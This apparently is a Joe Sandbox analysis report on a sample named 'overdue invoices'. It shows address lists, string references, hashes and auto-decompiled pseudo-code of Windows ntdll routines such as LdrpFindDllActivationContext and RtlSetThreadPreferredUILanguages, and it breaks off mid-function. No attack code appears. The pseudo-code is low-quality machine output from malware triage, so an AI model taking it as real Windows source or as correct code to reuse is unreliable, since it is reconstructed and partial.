                  0x009a3fb6
                  0x009f8317
                  0x009f831a
                  0x00000000
                  0x009a3fbc
                  0x009a3fc1
                  0x009a3fc9
                  0x009a3fd7
                  0x009a3fda
                  0x009a3fdd
                  0x009a4021
                  0x009a4021
                  0x009a4029
                  0x009a4030
                  0x009a4044
                  0x009a4046
                  0x009a4046
                  0x009a4044
                  0x009a4049
                  0x009f8327
                  0x009f8334
                  0x009f8339
                  0x009f833c
                  0x009a404f
                  0x009a404f
                  0x009a404f
                  0x009a4051
                  0x009a4056
                  0x009a4063
                  0x009a4063
                  0x009a4068
                  0x00000000
                  0x009a4068
                  0x009a3fdf
                  0x009a3fe2
                  0x009a3fe4
                  0x009a3fe7
                  0x009a3fef
                  0x009a4003
                  0x009a4005
                  0x009a4005
                  0x009a400c
                  0x009a4013
                  0x009a4016
                  0x009a4017
                  0x009a401b
                  0x009a401e
                  0x00000000
                  0x009a401e
                  0x009a3fb6
                  0x009a3eb1
                  0x009a3eb4
                  0x009a3eb7
                  0x009a3ebc
                  0x009f82a9
                  0x009f82ab
                  0x009a3ec2
                  0x009a3ed3
                  0x009a3ed5
                  0x009a3ed8
                  0x009a3ed8
                  0x009a3edd
                  0x009f82b3
                  0x009f82b6
                  0x00000000
                  0x009a3ee3
                  0x009a3ee8
                  0x009a3eed
                  0x009a3ef0
                  0x009a3ef3
                  0x009a3f02
                  0x009a3f05
                  0x009a3f08
                  0x009f82c0
                  0x009f82c3
                  0x009f82c5
                  0x009f82c8
                  0x009f82d0
                  0x009f82e4
                  0x009f82e6
                  0x009f82e6
                  0x009f82ed
                  0x009f82f4
                  0x009f82f7
                  0x009f82f8
                  0x009f82fc
                  0x009f82ff
                  0x009f82ff
                  0x009a3f0e
                  0x009a3f11
                  0x009a3f16
                  0x009a3f1d
                  0x009a3f31
                  0x009f8307
                  0x009f8307
                  0x009a3f31
                  0x009a3f39
                  0x009a3f48
                  0x009a3f4d
                  0x009a3f50
                  0x009a3f50
                  0x009a3f53
                  0x009a3f58
                  0x009a3f65
                  0x009a3f65
                  0x009a3f6a
                  0x00000000
                  0x009a3f6a
                  0x009a3edd
                  0x009a3dda
                  0x009a3ddd
                  0x009a3de0
                  0x009a3de5
                  0x009f8245
                  0x009a3deb
                  0x009a3df7
                  0x009a3dfc
                  0x009a3dfe
                  0x009a3e01
                  0x009a3e01
                  0x009a3e06
                  0x009f824d
                  0x009f824f
                  0x009f8254
                  0x00000000
                  0x009a3e0c
                  0x009a3e11
                  0x009a3e16
                  0x009a3e19
                  0x009a3e29
                  0x009a3e2c
                  0x009a3e2f
                  0x009f825c
                  0x009f825f
                  0x009f8261
                  0x009f8264
                  0x009f826c
                  0x009f8280
                  0x009f8282
                  0x009f8282
                  0x009f8289
                  0x009f8290
                  0x009f8293
                  0x009f8294
                  0x009f8298
                  0x009f829b
                  0x009f829b
                  0x009a3e35
                  0x009a3e38
                  0x009a3e3d
                  0x009a3e44
                  0x009a3e58
                  0x009f82a3
                  0x009f82a3
                  0x009a3e58
                  0x009a3e60
                  0x009a3e6f
                  0x009a3e74
                  0x009a3e77
                  0x009a3e77
                  0x009a3e7a
                  0x009a3e7f
                  0x009a3e8c
                  0x009a3e8c
                  0x009a3e91
                  0x00000000
                  0x009a3e91

                  Strings
                  • Kernel-MUI-Language-Allowed, xrefs: 009A3DC0
                  • Kernel-MUI-Number-Allowed, xrefs: 009A3D8C
                  • Kernel-MUI-Language-Disallowed, xrefs: 009A3E97
                  • WindowsExcludedProcs, xrefs: 009A3D6F
                  • Kernel-MUI-Language-SKU, xrefs: 009A3F70
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                  • API String ID: 0-258546922
                  • Opcode ID: ab38b6d9100c271db66e4f0c18d920dbb0f7555a9a4684b5799221e95a79a207
                  • Instruction ID: db29e5944f81a0771fec69359bdd9d7a5ccfdcd6d34a98b74c36ecfab331b86e
                  • Opcode Fuzzy Hash: ab38b6d9100c271db66e4f0c18d920dbb0f7555a9a4684b5799221e95a79a207
                  • Instruction Fuzzy Hash: D7F14A72D00618EFCB11DF98C981AEEBBBDFF89750F15456AE505A7211EB749E00CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C8E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                  Download Yara Rule
                  C-Code - Quality: 44%
                  			E009C8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xa8d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xa88464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xa85780 & 0x00000003) != 0) {
							E00A15510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xa85780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return L009DB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xa87984; // 0x532bc0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xa88464; // 0x74790110
					 *0xa8b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E009C9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xa85780 & 0x00000005) != 0) {
						_push(_t49);
						E00A15510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                  0x009c8e0f
                  0x009c8e16
                  0x009c8e19
                  0x009c8e1b
                  0x009c8e21
                  0x009c8e7f
                  0x009c8e85
                  0x00a09354
                  0x00a0936c
                  0x00a09371
                  0x00a0937b
                  0x00a09381
                  0x00a09381
                  0x00a0937b
                  0x009c8e9d
                  0x009c8e9d
                  0x009c8e29
                  0x009c8e2c
                  0x009c8e38
                  0x009c8e3e
                  0x009c8e43
                  0x009c8eb5
                  0x009c8eb9
                  0x00a092aa
                  0x00a092af
                  0x00a092e8
                  0x00a092e8
                  0x00a092af
                  0x009c8eb9
                  0x009c8e45
                  0x009c8e53
                  0x009c8e5b
                  0x009c8e5f
                  0x009c8e78
                  0x009c8e78
                  0x009c8e7d
                  0x009c8ec3
                  0x009c8ecd
                  0x009c8ed2
                  0x009c8ed2
                  0x009c8ec5
                  0x009c8ec5
                  0x00000000
                  0x009c8e7d
                  0x009c8e67
                  0x009c8ea4
                  0x00a0931a
                  0x00000000
                  0x00000000
                  0x00a09320
                  0x009c8ea4
                  0x009c8e70
                  0x00a09325
                  0x00a09340
                  0x00a09345
                  0x00a09345
                  0x009c8e76
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000

                  Strings
                  • LdrpFindDllActivationContext, xrefs: 00A09331, 00A0935D
                  • Querying the active activation context failed with status 0x%08lx, xrefs: 00A09357
                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00A0932A
                  • minkernel\ntdll\ldrsnap.c, xrefs: 00A0933B, 00A09367
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                  • API String ID: 0-3779518884
                  • Opcode ID: 6e99498a0833f0e3dc8b0012757c95bb49df38030ffab7c2deb4c5eaa79790b3
                  • Instruction ID: 439c498b3600dca52fb0d2a29646829bd021c4f19c4d4a89a5444b620f41df64
                  • Opcode Fuzzy Hash: 6e99498a0833f0e3dc8b0012757c95bb49df38030ffab7c2deb4c5eaa79790b3
                  • Instruction Fuzzy Hash: DA410B32E003199FDB34BB58985DF777279AB54358F05856DE808571A1EF706C80C793
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009CFAB0 Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E009CFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E009AEEF0(0xa87b60);
					_t134 =  *0xa87b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xa87b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xa87b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E009A6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E009A76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00A38938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0099B150();
													}
													_t116 = E00A36D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E009A75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xa88638; // 0x0
																	_t122 = L009A38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E009A76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E009A76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L009CFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L009A70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E009CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E009CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E009CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E009CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E009CFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xa87b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xa87b84 = _t75;
						_t73 = E009AEB70(_t134, 0xa87b60);
						if( *0xa87b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = L009AFF60( *0xa87b20);
							}
						}
						goto L5;
					}
				}
			}

















































                  0x009cfab0
                  0x009cfab2
                  0x009cfab3
                  0x009cfab4
                  0x009cfabc
                  0x009cfac0
                  0x009cfb14
                  0x009cfb17
                  0x009cfac2
                  0x009cfac8
                  0x009cfacd
                  0x009cfad3
                  0x009cfad3
                  0x009cfadd
                  0x009cfb18
                  0x009cfb1b
                  0x009cfb1d
                  0x009cfb1e
                  0x009cfb1f
                  0x009cfb20
                  0x009cfb21
                  0x009cfb22
                  0x009cfb23
                  0x009cfb24
                  0x009cfb25
                  0x009cfb26
                  0x009cfb27
                  0x009cfb28
                  0x009cfb29
                  0x009cfb2a
                  0x009cfb2b
                  0x009cfb2c
                  0x009cfb2d
                  0x009cfb2e
                  0x009cfb2f
                  0x009cfb3a
                  0x009cfb3b
                  0x009cfb3e
                  0x009cfb41
                  0x009cfb44
                  0x009cfb47
                  0x009cfb4a
                  0x009cfb4d
                  0x009cfb53
                  0x00a0bdcb
                  0x00a0bdcb
                  0x009cfb59
                  0x009cfb5b
                  0x009cfb5b
                  0x009cfb5e
                  0x00a0bdd5
                  0x00a0bdd8
                  0x00000000
                  0x00a0bdda
                  0x00000000
                  0x00a0bdda
                  0x009cfb64
                  0x009cfb64
                  0x009cfb64
                  0x009cfb67
                  0x009cfb6e
                  0x009cfb70
                  0x009cfb72
                  0x00000000
                  0x009cfb78
                  0x009cfb7a
                  0x009cfb7a
                  0x009cfb7d
                  0x009cfb80
                  0x00a0bddf
                  0x00a0bde1
                  0x00000000
                  0x00a0bde3
                  0x00000000
                  0x00a0bde3
                  0x009cfb86
                  0x009cfb86
                  0x009cfb86
                  0x009cfb8b
                  0x009cfb90
                  0x009cfb92
                  0x009cfb94
                  0x009cfb9a
                  0x009cfb9b
                  0x009cfba1
                  0x00a0bde8
                  0x00a0bdeb
                  0x00a0bded
                  0x00a0beb5
                  0x00a0beb5
                  0x00a0bebb
                  0x00a0bebd
                  0x00a0bec3
                  0x00a0bed2
                  0x00a0bedd
                  0x00a0bedd
                  0x00a0beed
                  0x00000000
                  0x00a0bdf3
                  0x00a0bdfe
                  0x00a0be06
                  0x00a0be0b
                  0x00a0be0d
                  0x00a0be0f
                  0x00a0be14
                  0x00a0be19
                  0x00a0be20
                  0x00a0be25
                  0x00a0be27
                  0x00a0be35
                  0x00a0be39
                  0x00a0be46
                  0x00a0be4f
                  0x00a0be54
                  0x00a0be56
                  0x00a0bef8
                  0x00a0bef8
                  0x00000000
                  0x00a0be5c
                  0x00a0be5c
                  0x00a0be60
                  0x00000000
                  0x00a0be66
                  0x00a0be66
                  0x00a0be7f
                  0x00a0be84
                  0x00a0be87
                  0x00a0be89
                  0x00a0be8b
                  0x00a0be99
                  0x00a0be9d
                  0x00a0bea0
                  0x00a0beac
                  0x00a0beaf
                  0x00a0beb1
                  0x00a0beb3
                  0x00a0beb3
                  0x00000000
                  0x00a0bea2
                  0x00a0bea2
                  0x00000000
                  0x00a0bea2
                  0x00a0be8d
                  0x00a0be8d
                  0x00a0be92
                  0x00000000
                  0x00a0be92
                  0x00a0be8b
                  0x00a0be60
                  0x00a0be3b
                  0x00a0be3b
                  0x00a0be3e
                  0x00000000
                  0x00a0be40
                  0x00a0be40
                  0x00a0be44
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a0be44
                  0x00a0be3e
                  0x00a0be29
                  0x00a0be29
                  0x00000000
                  0x00a0be29
                  0x00a0be27
                  0x00000000
                  0x009cfba7
                  0x009cfba7
                  0x009cfbab
                  0x00a0bf02
                  0x009cfbb1
                  0x009cfbb1
                  0x009cfbb8
                  0x009cfbbd
                  0x009cfbbd
                  0x009cfbbf
                  0x009cfbbf
                  0x009cfbc5
                  0x009cfbcb
                  0x009cfbf8
                  0x009cfbf8
                  0x009cfbfa
                  0x00000000
                  0x009cfc00
                  0x009cfc00
                  0x009cfc03
                  0x00000000
                  0x009cfc09
                  0x009cfc09
                  0x009cfc0f
                  0x009cfc15
                  0x009cfc23
                  0x009cfc23
                  0x009cfc25
                  0x009cfc27
                  0x009cfc75
                  0x009cfc7c
                  0x009cfc84
                  0x00000000
                  0x009cfc29
                  0x009cfc29
                  0x009cfc2d
                  0x009cfc30
                  0x00a0bf0f
                  0x00000000
                  0x009cfc36
                  0x009cfc38
                  0x009cfc3b
                  0x009cfc41
                  0x00a0bf17
                  0x00a0bf19
                  0x00a0bf48
                  0x00a0bf4b
                  0x00000000
                  0x00a0bf1b
                  0x00a0bf22
                  0x00a0bf24
                  0x00a0bf26
                  0x00000000
                  0x00a0bf2c
                  0x00a0bf37
                  0x00a0bf39
                  0x00a0bf3b
                  0x00000000
                  0x00a0bf41
                  0x00a0bf41
                  0x00a0bf41
                  0x00a0bf41
                  0x00a0bf45
                  0x00000000
                  0x00a0bf45
                  0x00a0bf3b
                  0x00a0bf26
                  0x00000000
                  0x009cfc47
                  0x009cfc47
                  0x009cfc49
                  0x009cfcb2
                  0x009cfcb4
                  0x009cfcb6
                  0x009cfcdc
                  0x009cfcdc
                  0x00000000
                  0x009cfcb8
                  0x009cfcc3
                  0x009cfcc5
                  0x009cfcc7
                  0x00000000
                  0x009cfcc9
                  0x009cfcc9
                  0x009cfccd
                  0x00000000
                  0x009cfccd
                  0x009cfcc7
                  0x00000000
                  0x009cfc4b
                  0x009cfc4b
                  0x009cfc4e
                  0x009cfc4e
                  0x009cfc51
                  0x009cfc51
                  0x009cfc54
                  0x009cfc5a
                  0x009cfc5c
                  0x009cfc5f
                  0x009cfc61
                  0x009cfc63
                  0x009cfc65
                  0x009cfc67
                  0x009cfc6e
                  0x009cfc72
                  0x009cfc72
                  0x009cfc72
                  0x009cfc72
                  0x009cfc67
                  0x009cfc61
                  0x00000000
                  0x009cfc5a
                  0x009cfc49
                  0x009cfc41
                  0x009cfc30
                  0x009cfc27
                  0x009cfc03
                  0x009cfbcd
                  0x009cfbd3
                  0x009cfbd9
                  0x009cfbdc
                  0x009cfbde
                  0x009cfc99
                  0x009cfc9b
                  0x009cfc9d
                  0x009cfcd5
                  0x009cfcd5
                  0x009cfc89
                  0x009cfc89
                  0x00000000
                  0x009cfc9f
                  0x009cfc9f
                  0x009cfca3
                  0x00000000
                  0x009cfca3
                  0x00000000
                  0x009cfbe4
                  0x009cfbe4
                  0x009cfbe4
                  0x009cfbe4
                  0x009cfbe9
                  0x009cfbf2
                  0x00000000
                  0x009cfbf2
                  0x009cfbde
                  0x009cfbcb
                  0x009cfbab
                  0x009cfc8b
                  0x009cfc8b
                  0x009cfc8c
                  0x009cfb80
                  0x009cfb72
                  0x009cfb5e
                  0x009cfc8d
                  0x009cfc91
                  0x009cfadf
                  0x009cfadf
                  0x009cfae1
                  0x009cfae4
                  0x009cfae7
                  0x009cfaec
                  0x009cfaf8
                  0x009cfb00
                  0x009cfb07
                  0x009cfb0f
                  0x009cfb0f
                  0x009cfb07
                  0x00000000
                  0x009cfaf8
                  0x009cfadd

                  Strings
                  • 2S, xrefs: 009CFAF1
                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00A0BE0F
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: 2S$*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                  • API String ID: 0-3890279140
                  • Opcode ID: e4a7569ca03f5d4c3dc264634074e10c416068f995c9aa8f9ad418d7098dd8f7
                  • Instruction ID: eddc358b78c8e0dbb2ca3227cf1caaba63c0424e51e5820a9b71df1ddaf3921c
                  • Opcode Fuzzy Hash: e4a7569ca03f5d4c3dc264634074e10c416068f995c9aa8f9ad418d7098dd8f7
                  • Instruction Fuzzy Hash: 9FA1F271F1060A8BDB25DF68C861BBAB3A6AF49710F14497EE846CB691DB34DC01CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A151BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E00A151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xa705f0);
				E009ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E009AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00A153CA(0);
						return E009ED130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E009DF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
